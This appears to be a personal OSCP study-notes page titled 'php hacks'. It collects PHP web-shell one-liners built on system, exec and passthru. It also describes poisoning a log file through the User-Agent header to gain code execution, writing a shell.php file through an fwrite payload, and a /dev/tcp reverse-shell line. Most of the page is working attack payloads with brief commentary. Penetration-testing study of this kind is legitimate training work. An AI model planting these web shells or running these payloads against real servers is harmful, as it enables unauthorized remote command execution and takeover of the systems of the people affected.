OSCP Notes
Comment on page

php hacks

reverse shell github repository:
<?php system($ REQUEST['cmd']); ?>
It looks like it's logging everytime someone visits the log.php
if we change the useragent to malicious code, we can execute?
<?php system($ REQUEST['cmd']); ?>
successfully executed
By changing te useragent to the code, it planted a code execution path with the file name (the file name can be anything)
  • changed useragent to the php code
  • changed file name to cmd.php in GET
now we can do reverse shell!
test php
echo("Gorigorisensei Hacking your System.") ;
Another case:
code=fwrite(fopen('shell.php','w'),'<?php echo exec($_GET["cmd"]);?>');
Logical Flows
Creating a file (write it)
2. put the command in it so it will be executed when we visit /shell.php?cmd=whoami
'<?php echo exec($_GET["cmd"]);?>');
since it didn't like having the single quotation mark when I used exec($_GET['cmd'])
other php one liners
POST didn't work since it's already creating a file for us in the first command.
Other one liners to try:
<?php echo passthru($_GET['cmd']); ?>
<?php echo exec($_POST['cmd']); ?>
<?php system($_GET['cmd']); ?>
<?php passthru($_REQUEST['cmd']); ?>
<?php echo system("0<&196;exec 196<>/dev/tcp/; sh <&196 >&196 2>&196"); ?>
Last modified 1yr ago